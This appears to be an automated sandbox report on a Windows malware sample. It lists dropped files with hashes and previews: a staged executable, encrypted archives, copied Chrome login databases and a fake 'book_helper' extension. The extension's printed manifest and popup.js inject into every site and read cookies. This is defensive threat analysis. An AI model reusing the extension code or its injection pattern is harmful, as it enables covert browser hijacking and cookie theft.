MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5361
Entropy (8bit):	5.184927901937767
Encrypted:	false
SSDEEP:	96:nYrRT/Xrspi863rI4+V7Sk0JCKL8xF7bOEQVuwv:nYrd/t863r3+9U4Kh
MD5:	01D789546E2AEAF9881380C4EE5C4DD6
SHA1:	01A9B24C8198BD661A402EDDBA0BABB1E54CAC66
SHA-256:	2A5E7EF1FC6E72B9AFC0EC0D30E67538637DACA82EBCC6061CB075471CF3D857
SHA-512:	ACAD5D062D1B1A018488261D1C2EDEE61AC87263FEDA15A870D6F2B4CF61EF8E3A0E7948B31A743FDA046FFDEFCEE845FA3AA2ACE2F49BCA5A7AB1297E68A9B7
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245950583460399","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245950583260338","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245950640095768","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1538886"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.539146915923536
Encrypted:	false
SSDEEP:	768:nEaf7DBUckPWFr+oXLl6y1kXqKf/pUZNCgVLH2HfjrUkGfnM6vJ:lthLvjfnh
MD5:	B8D78BF78F0834F84BF726D40FB0EEBD
SHA1:	DDD88DAA574A84985BFC291F64065184396230AD
SHA-256:	E039E1C07D325F0F6BF7D29195E9BC54F38D95CB0D3A6472AD7649B6787CC59B
SHA-512:	99A39DB5F25FD7A9226C36A29F5EFF234E79B17C20603D4A3C1F6814E11DB7162DEFCB0414B0ACE7B6162122FBF88E7444D11096F3BE8BC7F1B8486762BDF34C
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950593233950","lastpingday":"13245947458518717","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1611970726180 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1611970737242 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1611970728399 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1611970730398 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4999496
Entropy (8bit):	7.663640140797365
Encrypted:	false
SSDEEP:	98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe
MD5:	F7D7C89F3F5CBC925480B46B7B934157
SHA1:	73E389B70CF3D8975CCBAF7D04F4C45CC80BE860
SHA-256:	2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A
SHA-512:	9B972E2954C18F706A6F8012A6B76E1F4CE8E76466EAE919B55A6225C4F8574586D9F11838D8D63BDD245B11CFD3E581248E9A578F72FF2DD8B6623BEBC525EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 22%, Browse Antivirus: ReversingLabs, Detection: 59%
Joe Sandbox View:	Filename: N1yprTBBXs.exe, Detection: malicious, Browse
Preview:	MZ......................@............................................H.....L.!This program cannot be run in DOS mode....$............._..._..._.E_..._..v_..._.Wp_..._.WD__.._.WE_..._..m_..._..}_..._..._H.._.WA_Q.._.Wt_..._.Ws_..._Rich..._........PE..L......S..........................................@..................................Z....@..................................e..\|.... ..................H.... ..........................................@...............<............................text............................... ....rdata..xy.......z..................@..@.data...,........V...\|..............@....rsrc........ ......................@..@.reloc..2.... ......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6272167835D47591.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSI1983.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_engine.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
